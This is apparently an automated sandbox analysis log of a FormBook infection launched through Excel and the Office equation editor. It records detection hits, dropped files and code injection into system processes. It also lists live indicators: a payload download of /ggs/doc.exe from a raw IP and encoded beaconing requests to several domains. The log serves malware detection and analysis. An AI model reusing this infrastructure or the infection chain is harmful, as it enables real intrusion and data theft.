          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: unknownTCP traffic detected without corresponding DNS query: 18.140.1.169
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F152D108.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /ggs/doc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 18.140.1.169Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /p2io/?9rx=dKp6rERGX1oMTEkAtHZ5ksFEU2G9ncFkpMVxqDe1xbP28bbT8N8SqGfKoZnot7fJ59eAsw==&1bPx7=ifrhEpc0Hv8pf4 HTTP/1.1Host: www.myfavbutik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?9rx=V9Q6YNEpmTTku3594j8RVRt0udPCykKEN/raiLh+TizfOzW/z4mr+TojY495qvgWXqOzag==&1bPx7=ifrhEpc0Hv8pf4 HTTP/1.1Host: www.69-1hn7uc.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?9rx=lrOqxb+UJCh0p+XgaZ1tkMjkgx31NOkXgmck/5zOeb61pSaxp+mpU6ffv/qKl6HzQ2hiJA==&1bPx7=ifrhEpc0Hv8pf4 HTTP/1.1Host: www.defenestration.worldConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.myfavbutik.com
          Source: explorer.exe, 00000006.00000000.2194134421.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000006.00000000.2194134421.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000006.00000000.2183887794.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.2181831950.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.2181831950.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000006.00000000.2175772627.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: vbc.exe, 00000004.00000002.2172296489.0000000002501000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000006.00000000.2181831950.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.2183887794.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2183887794.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.2181831950.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.2194134421.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000006.00000000.2175772627.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2183887794.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.2181831950.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.2183887794.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.2182851298.00000000041AD000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.2182851298.00000000041AD000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.2181646383.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.2199605074.0000000002945000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2377936853.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.2169946011.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2377903647.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2208158353.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2172726786.0000000003509000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.35eb4f8.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.2199605074.0000000002945000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.2199605074.0000000002945000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2377936853.00000000001D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2377936853.00000000001D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.2169946011.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.2169946011.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2377903647.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2377903647.00000000001A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.2208158353.00000000003B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.2208158353.00000000003B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2172726786.0000000003509000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2172726786.0000000003509000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.35eb4f8.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.35eb4f8.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exeJump to dropped file
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004181B0 NtCreateFile,5_2_004181B0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418260 NtReadFile,5_2_00418260
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004182E0 NtClose,5_2_004182E0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00418390 NtAllocateVirtualMemory,5_2_00418390
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004182AC NtReadFile,5_2_004182AC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041838B NtAllocateVirtualMemory,5_2_0041838B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00730078 NtResumeThread,LdrInitializeThunk,5_2_00730078
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00730048 NtProtectVirtualMemory,LdrInitializeThunk,5_2_00730048
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007300C4 NtCreateFile,LdrInitializeThunk,5_2_007300C4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007307AC NtCreateMutant,LdrInitializeThunk,5_2_007307AC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072F900 NtReadFile,LdrInitializeThunk,5_2_0072F900
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072F9F0 NtClose,LdrInitializeThunk,5_2_0072F9F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FAE8 NtQueryInformationProcess,LdrInitializeThunk,5_2_0072FAE8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_0072FAD0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FB68 NtFreeVirtualMemory,LdrInitializeThunk,5_2_0072FB68
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FBB8 NtQueryInformationToken,LdrInitializeThunk,5_2_0072FBB8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FC60 NtMapViewOfSection,LdrInitializeThunk,5_2_0072FC60
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FC90 NtUnmapViewOfSection,LdrInitializeThunk,5_2_0072FC90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FDC0 NtQuerySystemInformation,LdrInitializeThunk,5_2_0072FDC0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FD8C NtDelayExecution,LdrInitializeThunk,5_2_0072FD8C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_0072FED0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FEA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_0072FEA0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FFB4 NtCreateSection,LdrInitializeThunk,5_2_0072FFB4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00730060 NtQuerySection,5_2_00730060
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007310D0 NtOpenProcessToken,5_2_007310D0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00731148 NtOpenThread,5_2_00731148
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0073010C NtOpenDirectoryObject,5_2_0073010C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007301D4 NtSetValueKey,5_2_007301D4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072F8CC NtWaitForSingleObject,5_2_0072F8CC
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00731930 NtSetContextThread,5_2_00731930
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072F938 NtWriteFile,5_2_0072F938
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FA50 NtEnumerateValueKey,5_2_0072FA50
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FA20 NtQueryInformationFile,5_2_0072FA20
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FAB8 NtQueryValueKey,5_2_0072FAB8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FB50 NtCreateKey,5_2_0072FB50
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FBE8 NtQueryVirtualMemory,5_2_0072FBE8
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00730C40 NtGetContextThread,5_2_00730C40
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FC48 NtSetInformationFile,5_2_0072FC48
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FC30 NtOpenProcess,5_2_0072FC30
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FD5C NtEnumerateKey,5_2_0072FD5C
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00731D80 NtSuspendThread,5_2_00731D80
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FE24 NtWriteVirtualMemory,5_2_0072FE24
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FF34 NtQueueApcThread,5_2_0072FF34
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0072FFFC NtCreateProcessEx,5_2_0072FFFC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022B00C4 NtCreateFile,LdrInitializeThunk,7_2_022B00C4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022B07AC NtCreateMutant,LdrInitializeThunk,7_2_022B07AC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_022AFAE8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_022AFB68
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFB50 NtCreateKey,LdrInitializeThunk,7_2_022AFB50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFBB8 NtQueryInformationToken,LdrInitializeThunk,7_2_022AFBB8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AF900 NtReadFile,LdrInitializeThunk,7_2_022AF900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AF9F0 NtClose,LdrInitializeThunk,7_2_022AF9F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_022AFED0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFFB4 NtCreateSection,LdrInitializeThunk,7_2_022AFFB4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFC60 NtMapViewOfSection,LdrInitializeThunk,7_2_022AFC60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFD8C NtDelayExecution,LdrInitializeThunk,7_2_022AFD8C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_022AFDC0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022B0060 NtQuerySection,7_2_022B0060
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022B0078 NtResumeThread,7_2_022B0078
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022B0048 NtProtectVirtualMemory,7_2_022B0048
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022B10D0 NtOpenProcessToken,7_2_022B10D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022B010C NtOpenDirectoryObject,7_2_022B010C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022B1148 NtOpenThread,7_2_022B1148
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022B01D4 NtSetValueKey,7_2_022B01D4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFA20 NtQueryInformationFile,7_2_022AFA20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFA50 NtEnumerateValueKey,7_2_022AFA50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFAB8 NtQueryValueKey,7_2_022AFAB8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFAD0 NtAllocateVirtualMemory,7_2_022AFAD0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFBE8 NtQueryVirtualMemory,7_2_022AFBE8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AF8CC NtWaitForSingleObject,7_2_022AF8CC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AF938 NtWriteFile,7_2_022AF938
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022B1930 NtSetContextThread,7_2_022B1930
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFE24 NtWriteVirtualMemory,7_2_022AFE24
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFEA0 NtReadVirtualMemory,7_2_022AFEA0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFF34 NtQueueApcThread,7_2_022AFF34
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFFFC NtCreateProcessEx,7_2_022AFFFC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFC30 NtOpenProcess,7_2_022AFC30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFC48 NtSetInformationFile,7_2_022AFC48
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022B0C40 NtGetContextThread,7_2_022B0C40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFC90 NtUnmapViewOfSection,7_2_022AFC90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022AFD5C NtEnumerateKey,7_2_022AFD5C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022B1D80 NtSuspendThread,7_2_022B1D80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_000981B0 NtCreateFile,7_2_000981B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_00098260 NtReadFile,7_2_00098260
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_000982E0 NtClose,7_2_000982E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_000982AC NtReadFile,7_2_000982AC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_008E632E NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,7_2_008E632E
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_008E67C7 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,7_2_008E67C7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_008E6332 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,7_2_008E6332
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_008E67C2 NtQueryInformationProcess,7_2_008E67C2
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0100A90E4_2_0100A90E
          Source: C:\Users\Public\vbc.exeCode function: 4_2_010063D14_2_010063D1
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E61D54_2_001E61D5
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001EC6884_2_001EC688
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001EEFF04_2_001EEFF0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E62324_2_001E6232
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E62404_2_001E6240
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001EE3D04_2_001EE3D0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E64904_2_001E6490
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E64804_2_001E6480
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B84C84_2_009B84C8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B39004_2_009B3900
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B02984_2_009B0298
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B34904_2_009B3490
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B34804_2_009B3480
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B84B84_2_009B84B8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B74C34_2_009B74C3
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B38F14_2_009B38F1
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B44E84_2_009B44E8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B8C104_2_009B8C10
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B44314_2_009B4431
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B8C204_2_009B8C20
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B88504_2_009B8850
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B89804_2_009B8980
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B896F4_2_009B896F
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B02884_2_009B0288
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B9ED84_2_009B9ED8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B9ECA4_2_009B9ECA
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B92F84_2_009B92F8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B92EA4_2_009B92EA
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B32384_2_009B3238
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B32364_2_009B3236
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B2B984_2_009B2B98
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B2B894_2_009B2B89
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B1FB04_2_009B1FB0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B1FA04_2_009B1FA0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B371E4_2_009B371E
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B37204_2_009B3720
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B7B784_2_009B7B78
          Source: C:\Users\Public\vbc.exeCode function: 4_2_009B7B6A4_2_009B7B6A
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E03304_2_001E0330
          Source: C:\Users\Public\vbc.exeCode function: 4_2_001E0DF04_2_001E0DF0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B8B15_2_0041B8B1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B9635_2_0041B963
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C4B5_2_00408C4B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00408C505_2_00408C50
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B4935_2_0041B493
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041B4965_2_0041B496
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C5395_2_0041C539
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D895_2_00402D89
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041CE855_2_0041CE85
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041BF125_2_0041BF12
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041C7955_2_0041C795
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0100A90E5_2_0100A90E
          Source: C:\Users\Public\vbc.exeCode function: 5_2_010063D15_2_010063D1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0075905A5_2_0075905A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007430405_2_00743040
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0076D0055_2_0076D005
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0073E0C65_2_0073E0C6
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007E12385_2_007E1238
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0073E2E95_2_0073E2E9
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0078A37B5_2_0078A37B
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007473535_2_00747353
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007423055_2_00742305
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007663DB5_2_007663DB
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0073F3CF5_2_0073F3CF
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007754855_2_00775485
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007514895_2_00751489
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074351F5_2_0074351F
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0075C5F05_2_0075C5F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007E26225_2_007E2622
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074E6C15_2_0074E6C1
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007446805_2_00744680
